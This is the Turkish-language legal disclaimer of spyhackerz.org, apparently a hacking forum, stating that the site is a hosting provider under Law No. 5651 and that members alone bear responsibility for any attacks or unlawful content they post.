Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.
Üst Alt